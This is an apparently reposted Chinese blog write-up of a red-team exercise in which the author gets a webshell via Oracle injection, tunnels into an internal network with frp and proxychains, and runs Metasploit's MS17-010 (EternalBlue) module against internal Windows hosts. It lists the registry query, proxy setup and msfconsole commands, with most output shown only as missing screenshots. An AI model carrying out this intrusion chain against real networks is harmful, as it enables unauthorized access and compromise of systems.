记一次内网ms_17-010的使用

admin

102359
文章

87
评论

2022年5月16日09:28:59评论243 views字数 1128阅读3分45秒阅读模式

最近一直在打HW。闲暇时间也没有了，因此最近很少发文，后期恢复正常了就会持续发文了。各位粉丝不要取关啊。

一、通过上传直接拿到webshell

前台通过oracle注入进入拿到后台管理员密码，然后进入后台直接上传拿到webshell。通过天蝎上传frp，成功搭建内网隧道。

0x01 连接天蝎

使用天蝎进行连接，有时候冰蝎的流量会被识别，因此天蝎也是一个不错的选择。

记一次内网ms_17-010的使用

0x02 查看3389端口

REG query "HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v PortNumber set /a Port=0x8f1

记一次内网ms_17-010的使用

0x03 搭建FRP

记一次内网ms_17-010的使用

二、使用远程桌面登录

0x01 配置proxifier

(1):设置代理服务器

记一次内网ms_17-010的使用

(2):配置proxifier

记一次内网ms_17-010的使用

0x02 使用远程桌面进行登录

记一次内网ms_17-010的使用

登录成功。

0x03 使用工具进行扫描

记一次内网ms_17-010的使用

发现5台主机存在ms17_010漏洞。

0x04 配置proxychains

vi /etc/proxychains.conf

记一次内网ms_17-010的使用

0x05 使用proxychains代理msf进行利用

proxychains4 msfconsole

记一次内网ms_17-010的使用

三、使用永恒之蓝进行利用

0x01 使用MSF获取win2008shell

(1):寻找payload

search ms17-010use 2options

记一次内网ms_17-010的使用

(2):设置目标主机

set rhost 192.168.0.104

记一次内网ms_17-010的使用

(3):进行攻击

run

记一次内网ms_17-010的使用

0x02 使用MSF获取win7shell

(1):设置目标IP

set rhost 192.168.10.38

记一次内网ms_17-010的使用

(2):进行攻击

run

记一次内网ms_17-010的使用

关于ms_17-010的使用方法，还可以使用NSA进行利用，上面的windows Server 2008使用MSF没有利用成功，通过NSA可以利用成功。大家可以参考下面这篇文章进行学习。

https://mp.weixin.qq.com/s/ck46QIT1uixEhNqdv1t25Q

记一次内网ms_17-010的使用

原文始发于微信公众号（想走安全的小白）：记一次内网ms_17-010的使用

左青龙
微信扫一扫

右白虎
微信扫一扫

记一次内网ms_17-010的使用

一、通过上传直接拿到webshell

0x01 连接天蝎

0x02 查看3389端口

0x03 搭建FRP

二、使用远程桌面登录

0x01 配置proxifier

0x02 使用远程桌面进行登录

0x03 使用工具进行扫描

0x04 配置proxychains

0x05 使用proxychains代理msf进行利用

三、使用永恒之蓝进行利用

0x01 使用MSF获取win2008shell

0x02 使用MSF获取win7shell

ebpf在Android安全上的应用：结合binder完成一个行为检测沙箱(下篇)

浅谈Kubernetes安全

若依系统恰分攻略

HW必备技能教学之Windows应急响应常见流程【附应急工具】

技术实践｜大模型内容安全蓝军的道与术

Weblogic SSRF漏洞（CVE-2014-4210）

Weblogic 反序列化漏洞（CVE-2017-3506/CVE-2017-10271）

HACKADEMIC: RTB1靶场-复现

卡巴斯基引擎另类免杀玩法

任意文件读取rce记录

发表评论

在线咨询

微信